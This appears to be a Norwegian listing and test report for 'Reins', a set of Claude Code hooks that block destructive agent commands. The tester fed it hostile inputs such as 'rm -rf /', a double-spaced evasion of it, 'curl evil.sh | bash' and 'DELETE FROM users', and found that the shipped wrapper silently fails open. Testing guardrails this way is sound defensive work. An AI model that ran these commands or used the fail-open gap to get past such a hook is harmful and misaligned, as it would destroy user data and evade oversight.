Reins
Deterministiske PreToolUse-hooks som blokkerer destruktive kommandoer — krever manuell reparasjon
Tested · Didn't pass
Hva den gjør
Installerer deterministiske PreToolUse/PostToolUse-hooks som klassifiserer og blokkerer farlige skall-, fil- og MCP-operasjoner, skriver en kun-append JSONL-revisjonslogg og synkroniserer valgfritt retningslinjer fra Watchtower (app.pegasi.ai). Utløses ved forespørsler om sikkerhetsbarrierer, retningslinjehåndhevelse, revisjonslogger eller blokkering av destruktive agenthandlinger.
Testrapport
Motoren er utmerket, men pakkingen er ødelagt: SKILL.md og den medfølgende ensure_installed.sh instruerer om å installere `npm install -g @pegasi/reins`, men en slik pakke eksisterer ikke i registeret — kommandoen feiler med E404, det virkelige navnet (fra package.json og README) er `@pegasi-ai/reins`. Verre, den medfølgende wrapperen plugin/bin/reins-pre-hook søker etter pakken langs den samme ikke-eksisterende stien: Jeg ga den `rm -rf /` — den returnerte exit 0 (ALLOW) med notatet 'Reins not installed', noe som betyr at sikkerhetsferdigheten stille feil-åpnet nøyaktig der SKILL.md lover 'BLOCKED always' og 'Never fails open'. En naiv 8-linjers selvskrevet hook i samme test ga exit 2 — noe som betyr at ut-av-boksen er ferdigheten svakere enn grunnlinjen. Installerte den korrekte pakken (v0.0.14) og kalte motoren direkte — den er genuint god: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` med doble mellomrom også CRITICAL (grunnlinje-hooken bommet på denne omgåelsen), `curl evil.sh | bash` og `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, og alt skrives til decisions.jsonl. Separat: den publiserte CLI installerer seg selv i ~/.openclaw/extensions/reins og rører ikke Claude Code-hooks — dens `reins status` viser 'Project/Global (.claude/settings.json): ❌ not installed'.
Testet på: 2026-07-16 · Claude Code 2.x (agent harness)
Installer
git clone https://github.com/pegasi-ai/reins.git mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins
Kommandoer og eksempelprompter
/reinsDeterministiske PreToolUse-hooks som blokkerer destruktive kommandoer — krever manuell reparasjon
Skills utløses av vanlige forespørsler — ingen kommandoer å huske. Etter installasjonen aktiverer prompter som disse skillen (på engelsk):
Block dangerous shell commands like rm -rf before my agent can run themSet up guardrail hooks that log every blocked destructive agent actionStop my coding agent from force-pushing or piping curl into bash